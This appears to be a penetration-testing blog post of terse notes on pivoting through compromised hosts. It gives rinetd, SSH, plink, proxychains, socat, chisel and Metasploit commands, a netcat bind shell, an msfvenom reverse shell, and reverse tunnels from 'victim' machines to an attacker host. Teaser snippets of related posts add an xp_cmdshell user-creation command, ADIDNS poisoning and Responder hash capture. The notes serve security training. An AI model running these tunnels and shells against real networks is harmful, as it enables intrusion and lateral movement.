Skip to main content

Port Redirection and Pivoting

By 


#Using SShuttle

 sudo sshuttle -r user@10.10.10.10 192.168.1.0/24
 Port Forwarding: It is accepting traffic on a given ip address and redirecting
it to different ip and port

Inbound: traffic initiated from outside.

Outbound: traffic initiated from inside.
 
time nmap -p- portquiz.net | grep -i open 
   /Helps in checking outbound traffic Open POrts
 
Example:
-------- 
a windows XP machine has only 80 and 443 ports have outbound traffic allowed,
but we need to access a server using RDP(3389) in the same network. to access that we need to use port forwarding,
that menas we need an intermediate proxy --> which can be our kali linux machine.

on Kali: 
---------- Need to have a Public Address, IDK

vi /etc/rinetd.conf  Port Forwarding Utility Config
I
#bindaddress bindport  connect address  connect port
KALI_Public_IP  80  RDP_Server_address 3389
esc
:wq

/ we set it up to accept traffic from external interface on TCP port 80 and then
redirect to our remote windows server 3389

/etc/init.d/rinetd restart

Copy the KALI_IP (Proxy IP) and run it in windows RDP --> you can access it

RINETD server forwards incoming traffic to the windows 2003 remote desktop service

 
SSH = Tunnelling & Proxies:
-----------------------------

SSH local Port Forwarding:  ssh -L
---------------------------
allows us to connects a local port to a remote port over an encrypte SSH tunnel.


SSH Remote Port Forwarding:
------------------------------
allows us to tunnel a remote port to a local port over an encrypte SSH tunnel.
 
 ON VICTIM Machine:
====================
plink.exe is a SSH client for windows

netstat -an | find "LISTEN"  /RDP port is open
 / we would like to access RDP port on this internal non-routable machine
 /we can create a reverse ssh tunnel from the victim machine from our attacking box and tunnel out the remote desktop machine from the windows machine and make that port available on my attacking box.


Check for listening ports 
netstat -an | find "LISTEN"

From the victim Machine, do a reverse ssh tunnel

Remote Port Forwarding: 
--------------------------

on VICTIM Machine:
--------------------

plink -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward

plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389  


on KAlI:  netstat -antp | grep LISTEN
--------
/we can find 3390 Listening on Kali Machine

rdesktop 127.0.0.1:3390  /Login through RDP using the Remote Tunnel

DYNAMIC PORT FORWARDING:
---------------------------SOCKS4 PROXY

ON Kali:
--------

SSH -D 8080 root@VICTIM_IP  /Need pass --> we can login.. and port forwarding port 22 as well

netstat -atnp | grep 8080  /Check if the port is opened or not

nano /etc/proxychains.conf

socks4 127.0.0.1 8080

proxychains nmap -p 3389 -sT -Pn Victim_IP/24 --open /Nmap TCP connect Scan the Victim Ip for RDP
 /Proxychains take this traffic and redirects it to the DMZ network(in this case - example), this is slow 

proxychains netdiscover -r VICTIM_IP/24 

proxychains rdesktop IP_Found_from_Nmap

Port Forwarding using Metasploit:
-----------------------------------
get a meterpreter session first --> Note the IP address of the victim (10.7.0.22)

background
route add 10.7.0.0 255.255.255.0 1
portfwd add -l 445 -p 445 -r 10.7.0.22

Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1


Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 
Port Forwarding using Netcat

nc -l -p $localport -c "nc $remotehost $remoteport"

netcat -nvlp 9001       /Listen on port 9001

netcat -l -p 9001 -e /bin/bash  /Create a bash shell on port 9001

netcat -L KALI_IP:80 -p 8902            /Forward local por 9002 to remote port 80

netcat -L kali_IP:80 -p 9002 -x        /Port Forward Hex dump


Pivoting from GITHUB



PORT FORWARDING "port to port":

----MSF----
Most platforms

Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse


----SSH----
For Linux

~C "if you already have an SSH session"

-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to


-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it


For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali


Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1


---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine

On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS


---SOCAT----
For linux

Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443


---CHISEL----
Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>


Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80


Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003





----------------------------------------------------------------------------------------





DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf


----MSF----
Most platforms

Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)


----SSH----
For Linux

-D1080


---PLINK---
Just like SSH, on Windows

On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS


---CHISEL----
Most platforms

On Kali:
./chisel server -p 8000 -reverse

On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

On Kali:
./chisel client 127.0.0.1:8001 socks




Depending on your scope, some of the machines may not be directly accessible. There are systems out there that are dual homed, which allow you to connect into an internal network. You will need to know some of these techniques in order to obtain access into there non-public networks:
Tools to help you with Port Forwarding and Pivoting:
Vulnerable systems to practice pivoting:
Labels:

Comments

  1. AnonymousApril 20, 2022 at 1:37 AM

    Port Redirection And Pivoting >>>>> Download Now

    >>>>> Download Full

    Port Redirection And Pivoting >>>>> Download LINK

    >>>>> Download Now

    Port Redirection And Pivoting >>>>> Download Full

    >>>>> Download LINK LZ

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more